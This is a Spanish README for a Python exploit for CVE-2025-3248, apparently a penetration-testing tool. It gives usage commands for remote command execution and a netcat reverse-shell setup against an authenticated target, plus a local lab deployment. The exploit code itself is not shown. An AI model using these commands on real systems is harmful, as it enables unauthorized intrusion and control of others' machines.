
Este script de Python explota CVE-2025-3248 para ejecutar comandos arbitrarios o generar una shell inversa en un sistema vulnerable. Se requiere autenticación para usar este exploit.
Este script de Python explota CVE-2025-3248 para ejecutar comandos arbitrarios o generar una reverse shell en un sistema vulnerable. Se requiere autenticación para usar este exploit.
requestsInstala las dependencias con:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Argumento | Descripción | Requerido |
|---|---|---|
-u, --url | URL base del objetivo (p. ej., https://target.com) | Sí |
-l, --login | Nombre de usuario administrador | Sí |
-p, --password | Contraseña de administrador | Sí |
-c, --command | Comando a ejecutar en el objetivo | No* |
--proxy | URL del proxy (p. ej., http://127.0.0.1:8080) | No |
--lhost | Host local para reverse shell | No* |
--lport | Puerto local para reverse shell | No* |
* Debes especificar un comando (-c) o ambos --lhost y --lport para una reverse shell.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Inicia un listener en tu máquina:
nc -lvnp 4444
Luego ejecuta:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Puedes desplegar la imagen Docker usando el siguiente comando:
podman compose up -d
La imagen estará disponible en http://localhost:7860.
Créditos del archivo compose: Este repositorio
Este script es solo para fines educativos y de pruebas de penetración autorizadas. No lo uses contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Este readme fue generado por IA.